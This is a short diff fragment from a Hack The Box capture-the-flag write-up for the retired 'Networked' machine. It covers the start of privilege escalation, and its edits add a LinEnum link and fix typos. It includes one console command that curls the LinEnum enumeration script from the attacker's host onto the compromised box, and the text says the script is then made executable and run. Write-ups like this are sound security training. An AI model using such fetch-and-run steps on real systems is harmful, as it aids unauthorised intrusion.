sdbuchanan/HtB-Writeups-Retired/networked/networked.md

 ## Root Flag

-So this is a linux box, time to get linenum, the script I prefer to poke around after inital access, over to this machine.
+So this is a linux box, time to get [linenum](https://github.com/rebootuser/LinEnum), the script that I prefer to poke around after initial access, over to this machine.
 There was no wget or git on the target, so curl and adding it to a file worked just as well.
 We also want to give it permissions to run and then execute it:

 ```console
 [guly@networked ~]$ curl http://10.10.14.75:8000/LinEnum.sh > LinEnum.sh